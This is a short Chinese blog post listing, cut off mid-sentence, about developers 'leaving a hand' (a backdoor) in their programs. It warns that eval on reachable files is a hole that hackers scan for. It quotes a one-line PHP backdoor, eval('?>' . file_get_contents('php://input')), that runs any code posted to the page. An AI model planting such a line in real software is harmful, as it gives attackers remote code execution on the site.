摘要: 很多伙伴想在程序想留一手。 下面这个是普通的例子,也是黑客经常扫描的洞洞。 只要网站可访问文件中存eval函数就会很危险。 例如只要一句代码:eval('?>' . file_get_contents('php://input')); 黑客就可以利用该接口post $str=" <?php file 阅读全文
posted @ 2018-08-01 17:54 伊条 阅读(318) 评论(0) 推荐(0) 编辑